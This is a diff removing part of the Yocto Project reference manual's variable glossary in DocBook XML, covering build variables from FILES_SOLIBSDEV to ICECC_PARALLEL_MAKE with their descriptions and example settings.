-        <glossentry id='var-FILES_SOLIBSDEV'><glossterm>FILES_SOLIBSDEV</glossterm>
-            <info>
-                FILES_SOLIBSDEV[doc] = "Defines the full path name of the development symbolic link (symlink) for shared libraries on the target platform."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the file specification to match
-                    <link linkend='var-SOLIBSDEV'><filename>SOLIBSDEV</filename></link>.
-                    In other words, <filename>FILES_SOLIBSDEV</filename>
-                    defines the full path name of the development symbolic link
-                    (symlink) for shared libraries on the target platform.
-                </para>
-
-                <para>
-                    The following statement from the
-                    <filename>bitbake.conf</filename> shows how it is set:
-                    <literallayout class='monospaced'>
-     FILES_SOLIBSDEV ?= "${base_libdir}/lib*${SOLIBSDEV} ${libdir}/lib*${SOLIBSDEV}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FILESEXTRAPATHS'><glossterm>FILESEXTRAPATHS</glossterm>
-            <info>
-                FILESEXTRAPATHS[doc] = "Extends the search path the OpenEmbedded build system uses when looking for files and patches as it processes recipes and append files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Extends the search path the OpenEmbedded build system uses
-                    when looking for files and patches as it processes recipes
-                    and append files.
-                    The default directories BitBake uses when it processes
-                    recipes are initially defined by the
-                    <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
-                    variable.
-                    You can extend <filename>FILESPATH</filename> variable
-                    by using <filename>FILESEXTRAPATHS</filename>.
-                </para>
-
-                <para>
-                    Best practices dictate that you accomplish this by using
-                    <filename>FILESEXTRAPATHS</filename> from within a
-                    <filename>.bbappend</filename> file and that you prepend
-                    paths as follows:
-                    <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-                    </literallayout>
-                    In the above example, the build system first looks for files
-                    in a directory that has the same name as the corresponding
-                    append file.
-                    <note>
-                        <para>When extending
-                        <filename>FILESEXTRAPATHS</filename>,
-                        be sure to use the immediate expansion
-                        (<filename>:=</filename>) operator.
-                        Immediate expansion makes sure that BitBake evaluates
-                        <link linkend='var-THISDIR'><filename>THISDIR</filename></link>
-                        at the time the directive is encountered rather than at
-                        some later time when expansion might result in a
-                        directory that does not contain the files you need.
-                        </para>
-
-                        <para>Also, include the trailing separating colon
-                        character if you are prepending.
-                        The trailing colon character is necessary because you
-                        are directing BitBake to extend the path by prepending
-                        directories to the search path.</para>
-                    </note>
-                    Here is another common use:
-                    <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/files:"
-                    </literallayout>
-                    In this example, the build system extends the
-                    <filename>FILESPATH</filename> variable to include a
-                    directory named <filename>files</filename> that is in the
-                    same directory as the corresponding append file.
-                </para>
-
-                <para>
-                    This next example specifically adds three paths:
-                    <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "path_1:path_2:path_3:"
-                    </literallayout>
-                </para>
-
-                <para>
-                    A final example shows how you can extend the search path
-                    and include a
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>-specific
-                    override, which is useful in a BSP layer:
-                    <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend_intel-x86-common := "${THISDIR}/${PN}:"
-                    </literallayout>
-                    The previous statement appears in the
-                    <filename>linux-yocto-dev.bbappend</filename> file, which
-                    is found in the Yocto Project
-                    <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
-                    in
-                    <filename>meta-intel/common/recipes-kernel/linux</filename>.
-                    Here, the machine override is a special
-                    <link linkend='var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></link>
-                    definition for multiple <filename>meta-intel</filename>
-                    machines.
-                    <note>
-                        For a layer that supports a single BSP, the override
-                        could just be the value of <filename>MACHINE</filename>.
-                    </note>
-                </para>
-
-                <para>
-                    By prepending paths in <filename>.bbappend</filename>
-                    files, you allow multiple append files that reside in
-                    different layers but are used for the same recipe to
-                    correctly extend the path.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FILESOVERRIDES'><glossterm>FILESOVERRIDES</glossterm>
-            <info>
-                FILESOVERRIDES[doc] = "A subset of OVERRIDES used by the OpenEmbedded build system for creating FILESPATH."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A subset of <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
-                    used by the OpenEmbedded build system for creating
-                    <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>.
-                    The <filename>FILESOVERRIDES</filename> variable uses
-                    overrides to automatically extend the
-                    <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
-                    variable.
-                    For an example of how that works, see the
-                    <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
-                    variable description.
-                    Additionally, you find more information on how overrides
-                    are handled in the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#conditional-syntax-overrides'>Conditional Syntax (Overrides)</ulink>"
-                    section of the BitBake User Manual.
-                </para>
-
-                <para>
-                    By default, the <filename>FILESOVERRIDES</filename>
-                    variable is defined as:
-                    <literallayout class='monospaced'>
-     FILESOVERRIDES = "${TRANSLATED_TARGET_ARCH}:${MACHINEOVERRIDES}:${DISTROOVERRIDES}"
-                    </literallayout>
-
-                    <note>
-                        Do not hand-edit the <filename>FILESOVERRIDES</filename>
-                        variable.
-                        The values match up with expected overrides and are
-                        used in an expected manner by the build system.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FILESPATH'><glossterm>FILESPATH</glossterm>
-            <info>
-                FILESPATH[doc] = "The default set of directories the OpenEmbedded build system uses when searching for patches and files. It is defined in the base.bbclass class found in meta/classes in the Source Directory. Do not hand-edit the FILESPATH variable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The default set of directories the OpenEmbedded build
-                    system uses when searching for patches and files.
-                </para>
-
-                <para>
-                    During the build process, BitBake searches each directory
-                    in <filename>FILESPATH</filename> in the specified order
-                    when looking for files and patches specified by each
-                    <filename>file://</filename> URI in a recipe's
-                    <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-                    statements.
-                </para>
-
-                <para>
-                    The default value for the <filename>FILESPATH</filename>
-                    variable is defined in the <filename>base.bbclass</filename>
-                    class found in <filename>meta/classes</filename> in the
-                    <link linkend='source-directory'>Source Directory</link>:
-                    <literallayout class='monospaced'>
-     FILESPATH = "${@base_set_filespath(["${FILE_DIRNAME}/${BP}", \
-        "${FILE_DIRNAME}/${BPN}", "${FILE_DIRNAME}/files"], d)}"
-                    </literallayout>
-                    The <filename>FILESPATH</filename> variable is automatically
-                    extended using the overrides from the
-                    <link linkend='var-FILESOVERRIDES'><filename>FILESOVERRIDES</filename></link>
-                    variable.
-                    <note><title>Notes</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                Do not hand-edit the
-                                <filename>FILESPATH</filename> variable.
-                                If you want the build system to look in
-                                directories other than the defaults, extend the
-                                <filename>FILESPATH</filename> variable by
-                                using the
-                                <link linkend='var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></link>
-                                variable.
-                                </para></listitem>
-                            <listitem><para>
-                                Be aware that the default
-                                <filename>FILESPATH</filename> directories do
-                                not map to directories in custom layers
-                                where append files
-                                (<filename>.bbappend</filename>) are used.
-                                If you want the build system to find patches
-                                or files that reside with your append files,
-                                you need to extend the
-                                <filename>FILESPATH</filename> variable by
-                                using the <filename>FILESEXTRAPATHS</filename>
-                                variable.
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                </para>
-
-                <para>
-                    You can take advantage of this searching behavior in
-                    useful ways.
-                    For example, consider a case where the following
-                    directory structure exists for general and machine-specific
-                    configurations:
-                    <literallayout class='monospaced'>
-     files/defconfig
-     files/MACHINEA/defconfig
-     files/MACHINEB/defconfig
-                    </literallayout>
-                    Also in the example, the <filename>SRC_URI</filename>
-                    statement contains "file://defconfig".
-                    Given this scenario, you can set
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    to "MACHINEA" and cause the build system to use files
-                    from <filename>files/MACHINEA</filename>.
-                    Set <filename>MACHINE</filename> to "MACHINEB" and the
-                    build system uses files from
-                    <filename>files/MACHINEB</filename>.
-                    Finally, for any machine other than "MACHINEA" and
-                    "MACHINEB", the build system uses files from
-                    <filename>files/defconfig</filename>.
-                </para>
-
-                <para>
-                    You can find out more about the patching process in the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#patching-dev-environment'>Patching</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual
-                    and the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-patching-code'>Patching Code</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    See the
-                    <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
-                    task as well.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FILESYSTEM_PERMS_TABLES'><glossterm>FILESYSTEM_PERMS_TABLES</glossterm>
-            <info>
-                FILESYSTEM_PERMS_TABLES[doc] = "Allows you to define your own file permissions settings table as part of your configuration for the packaging process."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Allows you to define your own file permissions settings table as part of
-                    your configuration for the packaging process.
-                    For example, suppose you need a consistent set of custom permissions for
-                    a set of groups and users across an entire work project.
-                    It is best to do this in the packages themselves but this is not always
-                    possible.
-                </para>
-
-                <para>
-                    By default, the OpenEmbedded build system uses the <filename>fs-perms.txt</filename>, which
-                    is located in the <filename>meta/files</filename> folder in the
-                    <link linkend='source-directory'>Source Directory</link>.
-                    If you create your own file permissions setting table, you should place it in your
-                    layer or the distro's layer.
-                </para>
-
-                <para>
-                    You define the <filename>FILESYSTEM_PERMS_TABLES</filename> variable in the
-                    <filename>conf/local.conf</filename> file, which is found in the
-                    <link linkend='build-directory'>Build Directory</link>, to
-                    point to your custom <filename>fs-perms.txt</filename>.
-                    You can specify more than a single file permissions setting table.
-                    The paths you specify to these files must be defined within the
-                    <link linkend='var-BBPATH'><filename>BBPATH</filename></link> variable.
-                </para>
-
-                <para>
-                    For guidance on how to create your own file permissions settings table file,
-                    examine the existing <filename>fs-perms.txt</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FONT_EXTRA_RDEPENDS'><glossterm>FONT_EXTRA_RDEPENDS</glossterm>
-            <info>
-                FONT_EXTRA_RDEPENDS[doc] = "When a recipe inherits the fontcache class, this variable specifies runtime dependencies for font packages. This variable defaults to 'fontconfig-utils'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-fontcache'><filename>fontcache</filename></link>
-                    class, this variable specifies the runtime dependencies
-                    for font packages.
-                    By default, the <filename>FONT_EXTRA_RDEPENDS</filename>
-                    is set to "fontconfig-utils".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FONT_PACKAGES'><glossterm>FONT_PACKAGES</glossterm>
-            <info>
-                FONT_PACKAGES[doc] = "When a recipe inherits the fontcache class, this variable identifies packages containing font files that need to be cached by Fontconfig."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-fontcache'><filename>fontcache</filename></link>
-                    class, this variable identifies packages containing font
-                    files that need to be cached by Fontconfig.
-                    By default, the <filename>fontcache</filename> class assumes
-                    that fonts are in the recipe's main package
-                    (i.e. <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>).
-                    Use this variable if fonts you need are in a package
-                    other than that main package.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FORCE_RO_REMOVE'><glossterm>FORCE_RO_REMOVE</glossterm>
-            <info>
-                FORCE_RO_REMOVE[doc] = "Forces the removal of the packages listed in ROOTFS_RO_UNNEEDED during the generation of the root filesystem."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Forces the removal of the packages listed in
-                    <filename>ROOTFS_RO_UNNEEDED</filename> during the
-                    generation of the root filesystem.
-                </para>
-
-                <para>
-                    Set the variable to "1" to force the removal of these
-                    packages.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FULL_OPTIMIZATION'><glossterm>FULL_OPTIMIZATION</glossterm>
-            <info>
-                FULL_OPTIMIZATION[doc]= "The options to pass in TARGET_CFLAGS and CFLAGS when compiling an optimized system. This variable defaults to '-fexpensive-optimizations -fomit-frame-pointer -frename-registers -O2'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The options to pass in
-                    <filename><link linkend='var-TARGET_CFLAGS'>TARGET_CFLAGS</link></filename>
-                    and <filename><link linkend='var-CFLAGS'>CFLAGS</link></filename>
-                    when compiling an optimized system.
-                    This variable defaults to
-                    "-O2 -pipe ${DEBUG_FLAGS}".
-                </para>
-            </glossdef>
-        </glossentry>
-    </glossdiv>
-
-    <glossdiv id='var-glossary-g'><title>G</title>
-
-        <glossentry id='var-GCCPIE'><glossterm>GCCPIE</glossterm>
-            <info>
-                GCCPIE[doc] = "Enables Position Independent Executables (PIE) within the GNU C Compiler (GCC)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Enables Position Independent Executables (PIE) within the
-                    GNU C Compiler (GCC).
-                    Enabling PIE in the GCC makes Return Oriented Programming
-                    (ROP) attacks much more difficult to
-                    execute.
-                </para>
-
-                <para>
-                    By default the <filename>security_flags.inc</filename>
-                    file enables PIE by setting the variable as follows:
-                    <literallayout class='monospaced'>
-     GCCPIE ?= "--enable-default-pie"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GCCVERSION'><glossterm>GCCVERSION</glossterm>
-            <info>
-                GCCVERSION[doc] = "Specifies the default version of the GNU C Compiler (GCC) to use."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the default version of the GNU C Compiler (GCC)
-                    used for compilation.
-                    By default, <filename>GCCVERSION</filename> is set to
-                    "8.x" in the
-                    <filename>meta/conf/distro/include/tcmode-default.inc</filename>
-                    include file:
-                    <literallayout class='monospaced'>
-     GCCVERSION ?= "8.%"
-                    </literallayout>
-                    You can override this value by setting it in a configuration
-                    file such as the <filename>local.conf</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GDB'><glossterm>GDB</glossterm>
-            <info>
-                GDB[doc] = "The minimal command and arguments to run the GNU Debugger."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments to run the GNU Debugger.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GITDIR'><glossterm>GITDIR</glossterm>
-            <info>
-                GITDIR[doc] = "The directory where Git clones will be stored."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The directory in which a local copy of a Git repository
-                    is stored when it is cloned.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GLIBC_GENERATE_LOCALES'><glossterm>GLIBC_GENERATE_LOCALES</glossterm>
-            <info>
-                GLIBC_GENERATE_LOCALES[doc]= "Specifies the list of GLIBC locales to generate should you not wish to generate all LIBC locals, which can be time consuming."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the list of GLIBC locales to generate should you
-                    not wish to generate all LIBC locals, which can be time
-                    consuming.
-                    <note>
-                        If you specifically remove the locale
-                        <filename>en_US.UTF-8</filename>, you must set
-                        <link linkend='var-IMAGE_LINGUAS'><filename>IMAGE_LINGUAS</filename></link>
-                        appropriately.
-                    </note>
-                </para>
-
-                <para>
-                    You can set <filename>GLIBC_GENERATE_LOCALES</filename>
-                    in your <filename>local.conf</filename> file.
-                    By default, all locales are generated.
-                    <literallayout class='monospaced'>
-      GLIBC_GENERATE_LOCALES = "en_GB.UTF-8 en_US.UTF-8"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GROUPADD_PARAM'><glossterm>GROUPADD_PARAM</glossterm>
-            <info>
-                GROUPADD_PARAM[doc] = "When a recipe inherits the useradd class, this variable specifies for a package what parameters should be passed to the groupadd command if you wish to add a group to the system when the package is installed."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
-                    class, this variable
-                    specifies for a package what parameters should be passed
-                    to the <filename>groupadd</filename> command
-                    if you wish to add a group to the system when the package
-                    is installed.
-                </para>
-
-                <para>
-                    Here is an example from the <filename>dbus</filename>
-                    recipe:
-                    <literallayout class='monospaced'>
-     GROUPADD_PARAM_${PN} = "-r netdev"
-                    </literallayout>
-                    For information on the standard Linux shell command
-                    <filename>groupadd</filename>, see
-                    <ulink url='http://linux.die.net/man/8/groupadd'></ulink>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GROUPMEMS_PARAM'><glossterm>GROUPMEMS_PARAM</glossterm>
-            <info>
-                GROUPMEMS_PARAM[doc] = "When a recipe inherits the useradd class, this variable specifies for a package what parameters should be passed to the groupmems command if you wish to modify the members of a group when the package is installed."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
-                    class, this variable
-                    specifies for a package what parameters should be passed
-                    to the <filename>groupmems</filename> command
-                    if you wish to modify the members of a group when the
-                    package is installed.
-                </para>
-
-                <para>
-                    For information on the standard Linux shell command
-                    <filename>groupmems</filename>, see
-                    <ulink url='http://linux.die.net/man/8/groupmems'></ulink>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GRUB_GFXSERIAL'><glossterm>GRUB_GFXSERIAL</glossterm>
-            <info>
-                GRUB_GFXSERIAL[doc] = "Configures the GNU GRand Unified Bootloader (GRUB) to have graphics and serial in the boot menu."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Configures the GNU GRand Unified Bootloader (GRUB) to have
-                    graphics and serial in the boot menu.
-                    Set this variable to "1" in your
-                    <filename>local.conf</filename> or distribution
-                    configuration file to enable graphics and serial
-                    in the menu.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
-                    class for more information on how this variable is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GRUB_OPTS'><glossterm>GRUB_OPTS</glossterm>
-            <info>
-                GRUB_OPTS[doc] = "Additional options to add to the GNU GRand Unified Bootloader (GRUB) configuration."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Additional options to add to the GNU GRand Unified
-                    Bootloader (GRUB) configuration.
-                    Use a semi-colon character (<filename>;</filename>) to
-                    separate multiple options.
-                </para>
-
-                <para>
-                    The <filename>GRUB_OPTS</filename> variable is optional.
-                    See the
-                    <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
-                    class for more information on how this variable is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GRUB_TIMEOUT'><glossterm>GRUB_TIMEOUT</glossterm>
-            <info>
-                GRUB_TIMEOUT[doc] = "Specifies the timeout before executing the default LABEL in the GNU GRand Unified Bootloader (GRUB)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the timeout before executing the default
-                    <filename>LABEL</filename> in the GNU GRand Unified
-                    Bootloader (GRUB).
-                </para>
-
-                <para>
-                    The <filename>GRUB_TIMEOUT</filename> variable is optional.
-                    See the
-                    <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
-                    class for more information on how this variable is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-GTKIMMODULES_PACKAGES'><glossterm>GTKIMMODULES_PACKAGES</glossterm>
-            <info>
-                GTKIMMODULES_PACKAGES[doc] = "For recipes that inherit the gtk-immodules-cache class, this variable specifies the packages that contain the GTK+ input method modules being installed when the modules are in packages other than the main package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-gtk-immodules-cache'><filename>gtk-immodules-cache</filename></link>
-                    class, this variable specifies the packages that contain the
-                    GTK+ input method modules being installed when the modules
-                    are in packages other than the main package.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-h'><title>H</title>
-
-        <glossentry id='var-HOMEPAGE'><glossterm>HOMEPAGE</glossterm>
-            <info>
-                HOMEPAGE[doc] = "Website where more information about the software the recipe is building can be found."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Website where more information about the software the recipe is building
-                    can be found.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-HOST_ARCH'><glossterm>HOST_ARCH</glossterm>
-            <info>
-                HOST_ARCH[doc] = "The name of the target architecture. Normally same as the TARGET_ARCH."
-
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The name of the target architecture, which is normally
-                    the same as
-                    <link linkend='var-TARGET_ARCH'><filename>TARGET_ARCH</filename></link>.
-                    The OpenEmbedded build system supports many
-                    architectures.
-                    Here is an example list of architectures supported.
-                    This list is by no means complete as the architecture
-                    is configurable:
-                    <literallayout class='monospaced'>
-     arm
-     i586
-     x86_64
-     powerpc
-     powerpc64
-     mips
-     mipsel
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-HOST_CC_ARCH'><glossterm>HOST_CC_ARCH</glossterm>
-            <info>
-                HOST_CC_ARCH[doc] = "The name of the host architecture. Normally same as the TARGET_CC_ARCH."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies architecture-specific compiler flags that are
-                    passed to the C compiler.
-                </para>
-
-                <para>
-                    Default initialization for <filename>HOST_CC_ARCH</filename>
-                    varies depending on what is being built:
-                    <itemizedlist>
-                        <listitem><para>
-                            <link linkend='var-TARGET_CC_ARCH'><filename>TARGET_CC_ARCH</filename></link>
-                            when building for the target
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>BUILD_CC_ARCH</filename>
-                            when building for the build host (i.e.
-                            <filename>-native</filename>)
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>BUILDSDK_CC_ARCH</filename>
-                            when building for an SDK (i.e.
-                            <filename>nativesdk-</filename>)
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-HOST_OS'><glossterm>HOST_OS</glossterm>
-            <info>
-                HOST_OS[doc] = "The name of the target operating system. Normally the same as the TARGET_OS."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the name of the target operating system, which
-                    is normally the same as the
-                    <link linkend='var-TARGET_OS'><filename>TARGET_OS</filename></link>.
-                    The variable can be set to "linux" for <filename>glibc</filename>-based systems and
-                    to "linux-musl" for <filename>musl</filename>.
-                    For ARM/EABI targets, there are also "linux-gnueabi" and
-                    "linux-musleabi" values possible.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-HOST_PREFIX'><glossterm>HOST_PREFIX</glossterm>
-            <info>
-                HOST_PREFIX[doc] = "The prefix for the cross compile toolchain. Normally same as the TARGET_PREFIX."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the prefix for the cross-compile toolchain.
-                    <filename>HOST_PREFIX</filename> is normally the same as
-                    <link linkend='var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-HOST_SYS'><glossterm>HOST_SYS</glossterm>
-            <info>
-                HOST_SYS[doc] = "Specifies the system, including the architecture and the operating system, for which the build is occurring in the context of the current recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the system, including the architecture and the
-                    operating system, for which the build is occurring
-                    in the context of the current recipe.
-                </para>
-
-                <para>
-                    The OpenEmbedded build system automatically sets this
-                    variable based on
-                    <link linkend='var-HOST_ARCH'><filename>HOST_ARCH</filename></link>,
-                    <link linkend='var-HOST_VENDOR'><filename>HOST_VENDOR</filename></link>,
-                    and
-                    <link linkend='var-HOST_OS'><filename>HOST_OS</filename></link>
-                    variables.
-                    <note>
-                        You do not need to set the variable yourself.
-                    </note>
-                </para>
-
-                <para>
-                    Consider these two examples:
-                    <itemizedlist>
-                        <listitem><para>Given a native recipe on a 32-bit
-                            x86 machine running Linux, the value is
-                            "i686-linux".
-                            </para></listitem>
-                        <listitem><para>Given a recipe being built for a
-                            little-endian MIPS target running Linux,
-                            the value might be "mipsel-linux".
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-HOSTTOOLS'><glossterm>HOSTTOOLS</glossterm>
-            <info>
-                HOSTTOOLS[doc] = "A space-separated list (filter) of tools on the build host that should be allowed to be called from within build tasks."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A space-separated list (filter) of tools on the build host
-                    that should be allowed to be called from within build tasks.
-                    Using this filter helps reduce the possibility of host
-                    contamination.
-                    If a tool specified in the value of
-                    <filename>HOSTTOOLS</filename> is not found on the
-                    build host, the OpenEmbedded build system produces
-                    an error and the build is not started.
-                </para>
-
-                <para>
-                    For additional information, see
-                    <link linkend='var-HOSTTOOLS_NONFATAL'><filename>HOSTTOOLS_NONFATAL</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-HOSTTOOLS_NONFATAL'><glossterm>HOSTTOOLS_NONFATAL</glossterm>
-            <info>
-                HOSTTOOLS_NONFATAL[doc] = "A space-separated list (filter) of tools on the build host that should be allowed to be called from within build tasks."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A space-separated list (filter) of tools on the build host
-                    that should be allowed to be called from within build tasks.
-                    Using this filter helps reduce the possibility of host
-                    contamination.
-                    Unlike
-                    <link linkend='var-HOSTTOOLS'><filename>HOSTTOOLS</filename></link>,
-                    the OpenEmbedded build system does not produce an error
-                    if a tool specified in the value of
-                    <filename>HOSTTOOLS_NONFATAL</filename> is not found on the
-                    build host.
-                    Thus, you can use <filename>HOSTTOOLS_NONFATAL</filename>
-                    to filter optional host tools.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-HOST_VENDOR'><glossterm>HOST_VENDOR</glossterm>
-            <info>
-                HOST_VENDOR[doc] = "The name of the vendor. Normally same as the TARGET_VENDOR."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the name of the vendor.
-                    <filename>HOST_VENDOR</filename> is normally the same as
-                    <link linkend='var-TARGET_VENDOR'><filename>TARGET_VENDOR</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-i'><title>I</title>
-
-        <glossentry id='var-ICECC_DISABLED'><glossterm>ICECC_DISABLED</glossterm>
-            <info>
-                ICECC_DISABLED[doc] = "Disables or enables the icecc (Icecream) function."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Disables or enables the <filename>icecc</filename>
-                    (Icecream) function.
-                    For more information on this function and best practices
-                    for using this variable, see the
-                    "<link linkend='ref-classes-icecc'><filename>icecc.bbclass</filename></link>"
-                    section.
-                </para>
-
-                <para>
-                    Setting this variable to "1" in your
-                    <filename>local.conf</filename> disables the function:
-                    <literallayout class='monospaced'>
-     ICECC_DISABLED ??= "1"
-                    </literallayout>
-                    To enable the function, set the variable as follows:
-                    <literallayout class='monospaced'>
-     ICECC_DISABLED = ""
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ICECC_ENV_EXEC'><glossterm>ICECC_ENV_EXEC</glossterm>
-            <info>
-                ICECC_ENV_EXEC[doc] = "Points to the icecc-create-env script that you provide."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the <filename>icecc-create-env</filename> script
-                    that you provide.
-                    This variable is used by the
-                    <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
-                    class.
-                    You set this variable in your
-                    <filename>local.conf</filename> file.
-                </para>
-
-                <para>
-                    If you do not point to a script that you provide, the
-                    OpenEmbedded build system uses the default script provided
-                    by the <filename>icecc-create-env.bb</filename> recipe,
-                    which is a modified version and not the one that comes with
-                    <filename>icecc</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ICECC_PARALLEL_MAKE'><glossterm>ICECC_PARALLEL_MAKE</glossterm>
-            <info>
-                ICECC_PARALLEL_MAKE[doc] = "Extra options passed to the make command during the do_compile task that specify parallel compilation."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Extra options passed to the <filename>make</filename>
-                    command during the
-                    <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-                    task that specify parallel compilation.
-                    This variable usually takes the form of
-                    "-j <replaceable>x</replaceable>", where
-                    <replaceable>x</replaceable> represents the maximum
-                    number of parallel threads <filename>make</filename> can
-                    run.
-                    <note>
-                        The options passed affect builds on all enabled
-                        machines on the network, which are machines running the
-                        <filename>iceccd</filename> daemon.
-                    </note>
-                </para>
-
-                <para>
-                    If your enabled machines support multiple cores,
-                    coming up with the maximum number of parallel threads
-                    that gives you the best performance could take some
-                    experimentation since machine speed, network lag,
-                    available memory, and existing machine loads can all
-                    affect build time.
-                    Consequently, unlike the
-                    <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>
-                    variable, there is no rule-of-thumb for setting
-                    <filename>ICECC_PARALLEL_MAKE</filename> to achieve
-                    optimal performance.
-                </para>
-
-                <para>
-                    If you do not set <filename>ICECC_PARALLEL_MAKE</filename>,
-                    the build system does not use it (i.e. the system does
-                    not detect and assign the number of cores as is done with
-                    <filename>PARALLEL_MAKE</filename>).
-                </para>
-            </glossdef>
